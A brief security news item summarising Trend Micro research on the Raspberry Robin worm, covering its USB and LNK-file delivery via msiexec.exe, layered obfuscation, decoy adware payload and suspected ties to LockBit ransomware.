Researchers at Trend Micro have been tracking Raspberry Robin since September and are warning the worm is notable for its 10 layers of obfuscation and its ability to deploy a fake payload to throw off detection efforts.
The malware is known for relying on infected USB drives as a distribution vector to download a rogue MSI installer file that deploys the main payload responsible for facilitating post-exploitation.
The payload loader, for its part, is orchestrated to load the decoy payload, an adware dubbed BrowserAssistant, to throw off detection efforts.
Trend Micro said it found similarities in a privilege escalation and an anti-debugging technique used by Raspberry Robin and LockBit ransomware, hinting at a potential connection between the two criminal actors. Once the user connects the infected USB to the system, Raspberry Robin initially arrives as a shortcut or LNK file. The LNK file contains a command line that runs a legitimate executable to download a Windows Installer (MSI) package. This legitimate executable is usually msiexec.exe, but we have also seen wmic.exe used in other samples.
Trend Micro’s analysts comment that the recent additions in Raspberry Robin’s TTPs (tactics, techniques, and procedures) bear similarities to LockBit, so the two projects might have a connection.
IOC Raspberry Robin